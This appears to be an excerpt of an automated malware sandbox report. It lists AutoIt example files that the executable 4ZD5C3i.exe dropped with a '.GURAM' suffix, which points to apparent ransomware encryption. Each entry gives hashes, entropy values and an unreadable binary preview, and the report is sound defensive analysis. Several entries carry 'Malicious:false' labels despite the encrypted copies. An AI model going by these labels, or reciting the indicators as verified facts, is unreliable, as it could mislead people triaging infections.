                                                                                                                                                                                                                                                Preview:.g.;''Pa.G1..+..!..E%2.....(H.9..v.q.V.{.m.Nl....sTM.U..E.f..b=l..5l....,y.2k.4..Soq.{.f.M.H[..JtVs......IDS.D.l...../.S.$...C.../.t......>.M..&)..Y..F..k..q...L.*.2.....3..P..3.S...T.J6.``.K.....P..(..^`6}.5...*.@FU[..[.qA...+1.}/.gX.R#&.P.x..f.O.o....[N./..}`a."....Su..kiN....OFp.s.E.....f<.r....==h.....Z........e1Sm.&.....u.o*.k\.3Okl..r.PlW.h.. )d....8:~........55.}..vZ..x....1.@..84\1..h..B.o.....e..c]....s..o4[..uQ..VL...<..~..y.P..W...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S...

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\ProcessList.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1180
                                                                                                                                                                                                                                                Entropy (8bit):7.804634197170864
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:tPC0BsDLWmKU2Y0sADjmJrc0YXUZtwsTba:YWmP0sS4o0jZtwKa
                                                                                                                                                                                                                                                MD5:423770376B6ACCFBFBEC2FB388F03138
                                                                                                                                                                                                                                                SHA1:19644F5120824DA0C47FC500FC2DA5A43982AE00
                                                                                                                                                                                                                                                SHA-256:12ECB6D93941A469554062740C866DCBA5477FD835A94458E563516E49360CA8
                                                                                                                                                                                                                                                SHA-512:495D042AA3CAAE0F76B18063A9CD13CC0BD21FCB60A2B7406686CF3B5A5DCA5D47FF54C0A45485B3381667AEE3A34AFC20B1DDD2874C9E6B240841DA65425A8B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...k'.N.....o.l.B...^..m.VU.?.."x...9zc2p._R.....^..a:.G=.qq...y`...............;.'R....2.E+...N.C...\. ...K...H..`....\.6-sss.s;"?..L..`.].Z...... .'2.^...!D...9...s.Wx~.$;J..a.>..._..f.E[j2.5..Z2.,{..`...q...J.....k:.3g..H...;%.$...F.Sx...^...].{/..............Y_.a.h.T.......~A.J.p.9.}>..x...U...[.T.G..m.y>H.f...Yj..%..O}Cw..y..k.%..4t...y...i$.3./.H......[.a0...F?.P...i.e._...{..w0.....Q..s...?..+<..........'.s.P..P....I...b...%j..yy.XW......c.z...y:j%.....e-?...L..%m.....k.A(..&4.j[w...E..>'....../.....d0.A2.X.0.H05s.H....Ol....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\ProcessSetPriority.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1031
                                                                                                                                                                                                                                                Entropy (8bit):7.810838731264152
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:PSpM1cwxYwSSjTSl48XjmJrc0YXUZtwsTv0:Pv1kSKi8T4o0jZtwW0
                                                                                                                                                                                                                                                MD5:B4BADFC6B9A05FC8C3B24FC366574045
                                                                                                                                                                                                                                                SHA1:1C7AE8AF8852CFBFCEB459189A8FFF3A8BAEFF58
                                                                                                                                                                                                                                                SHA-256:83FE425BB2DC46CDF559BA176A9DE1CB6FD82EF304CE8EC0F6529C92FEDC520A
                                                                                                                                                                                                                                                SHA-512:9D0E2DD48DDD43404DE71F0BAAE0C923A972FB693CE80F3619A4D987518CADF55C262BCD4DAF114DA53F817C670F0549694DA8546E4047448A1097A14089EFB2
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:OK?......H.J.D..h...PX...G.4.zEr^.]...".h.#E0.....q.=.@{si... .?Df.@....p......h..o....?.(.^Q...>n..]...z...O8`.P.90...Jmt`.&.DL..r..Ts.E#.I).|SK....ln.....(T.jk.%J..m..{..jB..R.7..Dl9. .41.8Y".*.A.}.=.......d...".\.'VT.}!..,..C<..<...vVW.i.1.ei...L..Y.(5."To=.JH...!...c.QW.'....qM".m.S...p&....xp.Y*.q.${.....i.vo.yQ.r.....!B. Y..i..r>.c.k.Z...Z....`r.=.X.~...#....KPBDv.L ..w..cn\.a..[(.YH...Yad..O..+..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.....l|.;...$Uj*\Dh}./Q..E..2.._.

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\ProcessWait.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):680
                                                                                                                                                                                                                                                Entropy (8bit):7.645934344398065
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:Y6X9CqxwFMjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZeYlkku:39jxGMjmJrc0YXUZtwsTCD
                                                                                                                                                                                                                                                MD5:7D395D0260B39010A1B04888AD693BEA
                                                                                                                                                                                                                                                SHA1:4F92512E61CE785BC1005EFEB9C8C83AF2C3DA72
                                                                                                                                                                                                                                                SHA-256:7010808208A6EE8E13D3A4796B4161C3EFB4FBC980B2184C861099292FBB540F
                                                                                                                                                                                                                                                SHA-512:AA4510ECBEFF2AD432793C96AC13138806DD7FC2EF21FDA761E86859DFAA2B9DB21E7BF1CFB003FB64436A922A0B7A94CB1FA2A33AEC7A9C4353CF0BFC53C465
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....q.DjH...EZ..!.*1...5.8.#f...&.a..h.. '....@2..r.}..-..$..sk.$..@..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..~.P.......{w>.q.S23.x(V.O.(y......H...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\ProcessWaitClose.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):820
                                                                                                                                                                                                                                                Entropy (8bit):7.724459198274015
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:0KfkZW3/fjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZ3se0ku:0mwkjmJrc0YXUZtwsThs
                                                                                                                                                                                                                                                MD5:1FA46E91F4737D403ACFCF90B990A749
                                                                                                                                                                                                                                                SHA1:A0CF175139281CE6F7B3C21B89A4550AB7BC7F7B
                                                                                                                                                                                                                                                SHA-256:85C98D91A250DC72F316DC7CFFF6B635D3FA10E95EFA8BB12F2E388C65A36E63
                                                                                                                                                                                                                                                SHA-512:1A718FCD9F54635BDFB47A4FC1C2F7CFA0F647B0FFD9FD37DE207B06B8066E1C97B3EA320DAC8A256EA86C8C461FFD512FB678189DCC281F650FB84328E01817
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.9m....4..QE.9...>..yUK ........6...(.G.S......r..N.|v..A.....7o.i)Y...i2.vo..G.jA..1...j..2.j.1.E|..5....Z<.^IOt....%..rJ*.#".. 5.r'...............(.'...].p...+X*Q....g..>.Z5..sl......o.95Q.......$.F+t..:.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.xY..kD(..%...%.x..e2..dm.........M....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\ProgressOn.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1201
                                                                                                                                                                                                                                                Entropy (8bit):7.822558948402626
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:SNrIWTjkAOO3lVZRfISPRN1cqulca5Krl3snjmJrc0YXUZtwsTqU:SNrIWTwDOrZRASJN1sa1sj4o0jZtw6
                                                                                                                                                                                                                                                MD5:880810E4213F63D870876814AF521CA2
                                                                                                                                                                                                                                                SHA1:B647450360844BA2F1E465A07654626206C83721
                                                                                                                                                                                                                                                SHA-256:AD49FC8C2AA1269A1288BDF3E2F8380FE15CF8293609988790E604EC20AA20A8
                                                                                                                                                                                                                                                SHA-512:B8A4A58CB10D1E04D3C5872D21A3EE6C732F6D7CE387F43BB277D71BC211B35106B12DF8DB3CCA4CA1B5CB17A10F6CBC6AA4EA5F5DD072B93E5C06B2B9A8DF69
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:`.|V.[g..W....@.'...^z..P...7....Z...hzM%....?............fU......B.~.#.........!Nf........Z....TH..*.=..ob?.c....q...z.(PPc.O...%rY.l:.gk...*p.a.cN}.S.sj[F.2..3.rb......;..I.....8..Y....& g.-..!.....',.w'=....P.~s....t..6.ypsp.*..=F.....l.X.f...L.......6...yE....C.;+..wf..i......:...<.d...)KLM...U2..w...=..~2..bb..U......y.......BHX.t(r..,......_.....Q......#7y...O....+a.yk.I..\..w.*.......UB....XO.Z..&.X.....HfT.d[,.@X.@.3...?`..~W;3.8.-6....E...p.....\G.yl..%.Ct...7>. Om....?..W.1.....,....!`...;...HW.W...!|B...gkT.:5E.E.....o.....3....M.S...vG.h.....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|............

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\Ptr.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):966
                                                                                                                                                                                                                                                Entropy (8bit):7.783024882905906
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:VtPBMtP0cdVU4z5eNl3a9lUz4y82jmJrc0YXUZtwsTljn:VD6Rd3z5UilDy8I4o0jZtwQT
                                                                                                                                                                                                                                                MD5:8ABF82EA6AB999B62D68BC5E0A130251
                                                                                                                                                                                                                                                SHA1:81CB44BE1573A89145550C56B62BE639515FE6A1
                                                                                                                                                                                                                                                SHA-256:1C1AE4E4A5F8836FDF34F6FF5F2C91AB2512AB73FBBC98F26AB4D3A67752FF06
                                                                                                                                                                                                                                                SHA-512:3AA293AD9F2DB9206C1FDFAD4BF8E127CD83E95164EA6CF25B797DC668D04C87AE13A055B93AD7AFADA93EA3F39B5D2F74F58AC61B9CCC0A28B9771AD569DC5F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.<GLO...xi....@y.H.""..#z.ck#...Q..uG.^...........m...k.....3*....EP.L..o#6.H&..=."A)............?.9..oa.......i.i...t..3_]..`..M.....X.sc..2(6Qr.s.B.y..x..zy.D-p.sY.....*A..L...._V\".?.....g..yv..M..KH.2.....U..R..&...M.}H...........mA.<...J.M......P..mD.^f^8v...`g,rT...1s=.@j...t..l{=].O*'!.u..mjJ...... ...J...~UG.l=.l....'\.H.s+...gQ...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..,..5.G....6..^.H.....-.....|.;.|f...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\Random.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                Entropy (8bit):7.795862623105016
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:0PBakGKWo8yiqVSiA+1BFr+x8RsXEEAxajaGJYIsS+WwgHIc0jmksXU4HrkW6tDq:2MqV71zr+xNtOajmJrc0YXUZtwsTw6k
                                                                                                                                                                                                                                                MD5:456D8A4C4D43E24F290BA562DCE97662
                                                                                                                                                                                                                                                SHA1:FC962592B599B551D6F4B07F9695B2664478DA3D
                                                                                                                                                                                                                                                SHA-256:C3601DB15666982CA8FB87345523870A862FDE5322D4BC558F564518A6CAD43C
                                                                                                                                                                                                                                                SHA-512:03D88B3C919D9101565648FFFC68F50CE745D675AEB854D59934A4A525BFA35A8D4D9786EF26CE2A326E6969AA5A3267CA203FA8A1BE97B92A06E0C0D6289380
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.............,...La..7........XB..;.`.u.Lio.......w. }ux.Z:.sF.L..^!]w....2.\.29.`..g.]....:....FM5......0.'l..h..I..~...W..I...ME\..<h.DxI.......M...I3..x..%J..p..H...0..b......f.i.b..:U8B.....V.x.E..tO<.V......\|u....../.%...K\..6_...}R..?G............@0...j.0h........X..sMS~.P%.bB,..P8..g.9!)...+..h".,..R.iF.CX.'...LX.....6.P....l.F.~B...,.V.}H83.:........O.,:.%.!(.Z.u.....g...bM..e......C..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.3z.@..v..I...:x.._.Yr&......\A..._..

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\Random[2].au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:PGP Secret Sub-key -
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):831
                                                                                                                                                                                                                                                Entropy (8bit):7.7359823128421
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:kqMveOeAHzvWVM2DjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZ8aa:jmTTOVMmjmJrc0YXUZtwsTHa
                                                                                                                                                                                                                                                MD5:0BE152D518D6B31D35ACA1E530127C00
                                                                                                                                                                                                                                                SHA1:03F194801D96EB7C37A1FA2766E2B8ECFF42577D
                                                                                                                                                                                                                                                SHA-256:B16A4A6EEC3B9A1114C35FC260B7C7D3DD4E7B7C87513EA7A61B87B8DA02A59D
                                                                                                                                                                                                                                                SHA-512:075F338A69C7145571B33F00AA760E246CA3101BC22DD0633258FE5AD4082DE944899E32FC65C2CFB3C92610455DAFE809E4C2DC0F280D27861D7DB4377CCCAA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..q.!O8.H.^)..>...S.&.$<..L.}r.+-...mj..&....-_/....._v........v...x.._..z.....!.9...TS.a.....0...i1.....(.....Ib2F..%........b$....k+9........,yD..U.".tQ.0n.......0.2s.fb..........M.fu....J..6sA.O.\n........a.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..Z.p.)[....{%j...@.p.XK.T.R.M.T........................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\Random[3].au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1126
                                                                                                                                                                                                                                                Entropy (8bit):7.795840706354453
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:9tI1piL/qPhRxu3ZsihHo44oC1PhCFJH1jaGJYIsS+WwgHIc0jmksXU4HrkW6tDe:9K1pQ/cVCiP0H1jmJrc0YXUZtwsTQZv
                                                                                                                                                                                                                                                MD5:B83177BD7F55CCAB63EFAFC80EF85495
                                                                                                                                                                                                                                                SHA1:D078CDBDEB60130EB9F5A30C50FF5A88C78A62AD
                                                                                                                                                                                                                                                SHA-256:6A2E93F881DECB8412B44D73712973413E1B5697612043C0DDC9F2CBAE2B6633
                                                                                                                                                                                                                                                SHA-512:5147286E45F9B0BBC55C10857FC57F1F1FCD787D87A808489D66F1B99742811D45A1F69B7FB454EF4469CA0069C4978E531AB0155D30B3E20A86512E9367B2B4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..ss.N..au.+Z...8..).y.6.[.D....1..K]d...r.r.....'-.....\.....nq.....b..#..j1..I....!X......!..}[...oT50..,b6GY..b......}.w...j.m......4..jV2...O.....N....'...\..b9.P.'.?.>..G..s....s.txQ...a...]..qZ..p.............H..6.j..#.WtC2..K...\.M..k..r...E.l....vz.I6...<...k.&} ..J........,=V..b .y.Mx./..d..G...h..pnV#...*.o.|....f...*.d...m<!.,.4.v..-...~......0S(..:......p. .M...M..I..%..]e.....Z>..G)h..S.AO./.H....l.S..mf... m....<.t./.d.....=....)....!'.7U&.$......"..~g..z.E..WN.t...i....+....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\ReDim.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1005
                                                                                                                                                                                                                                                Entropy (8bit):7.769079103749971
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:ocHCqkIZ+jaF7WyyVqdNjmJrc0YXUZtwsTL8E:ocHCqBcR64o0jZtwI8E
                                                                                                                                                                                                                                                MD5:FBE3377B8FB315D0982185368D638979
                                                                                                                                                                                                                                                SHA1:C25A4504089EEF60CA7194C48888EA051BD83F59
                                                                                                                                                                                                                                                SHA-256:92BC973F3DD9E3905E934EE5EE02914C977D29B58F5E6201FD5C88DA5605726E
                                                                                                                                                                                                                                                SHA-512:0DE615B72A9A1341F4ED8A6BFCEA9143273F6EDD9450751C4AB863FC303096AF124EB6FCD9C120CD67A328E7ACF4DDA8A77B1D179025980444ABC1A2EE7F9934
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.6.<.....B..z.. ..FF..G..0..q..O..t#.v.(..BS.b...i_.%...u4.4..~.....s.+.o7...j.M..*.(.m..1..]..&."..1.u36.>..>7]uL......w.{......"_c}.iw..L...mgH..i..F~...y.!.1d.[.i..%..HK..v...O )Q.y...1ma.=...8..5...^...3.e^....>@*.m.|P..... ....7..|.......t..P..&...s..5.....3L../..z.k.....o..:...W...B.5C*.~..2kzv?.z...7..^4..d5.}j..{..m.P..s .C..Mu(h.66&"Q.i..N......r.M...zV.w....<..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$....H.......0=...d9q.t.?.....<...N{?....................fk.

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\ReDim[2].au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2311
                                                                                                                                                                                                                                                Entropy (8bit):7.922397806948471
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:8XW81xCvUylLv+qGX1YhvBVuyIkWpXM72C/SKUIOVQpl9Wz4o0jZtwa:8GJP9vAX+vBVuAWdoWKUuTlea
                                                                                                                                                                                                                                                MD5:7BDB054641A8E442B5E90CCB994026B4
                                                                                                                                                                                                                                                SHA1:74A5230FC88FE0569EB902AC87F312959D0EA488
                                                                                                                                                                                                                                                SHA-256:7714492167065F9B8BEDCB2CA909225665B23E35E30AA73AA4231D7B8C5BED75
                                                                                                                                                                                                                                                SHA-512:329B89955B684CE73691877B3AEBF37C5520041FA84CB130284FB58EE8ED8B24AC891615DFCA702187C4AAF0B4E53A3FE67E42FA44D4ED2927DAF44A5497D9CC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:<...4v..!.t..PoQ....h..>.\......1...8|D...K.;{9.Q>A&R.>c..{..?x.v....t=.I(..a.f.#....&..>.n.........)|.il.i?-.5P.r...y.-.}N.&. ].:..HV.'....k.v.z..u...l..../u...U.v..,.H..........nX..~8..a.GX/v...m.i..3h|.r......\C..;H..ZRGA4..|.m...6.&...QR{.s.M.B..:.v. o..)....n.$.>..L...{...o4%.q(.j.y9|...Q...u.....S......?....srrW.= `..R..."..bXH..^YM*..PN. .ZPG.U...r.sL..$.{A....n*%VC]....|>.....-.@..C....I.....I.z.k..l...Y.cAi..H.'..h.i:..%..l%c..$..c?_.1W.|....Jf..=...7..c.83.K_z...Y:P....=m.t9......t....E...\..f....?m+(B6.'.fV...I.....w;*....i....$.&....W..e..6.%..~J#.*....H..!......J...r....y.bUM7.;J..h.7...m..jYS......&....%n&!..!.T...*B...Z...n.l.b.........H.l[...{KK...}z..~=f...a.Ex.Q4..."0./........./..A\;..x...A.hE..o....$h.@..?..?..R.mi.....3.89.N^.E..t..d#.K...j.Pa.f/.a...(.Dw .,{....m.....IK9.>.;.....6...w.L)..c8...g..t.f...Mql\..t#{$EAu.9...K.....~.-#v.......5.*.]LZ..B...(.hL.Q....V.k....~..d.......l......;..kc.\..+....7..y.x.`l.....9..U)Y>.+$.

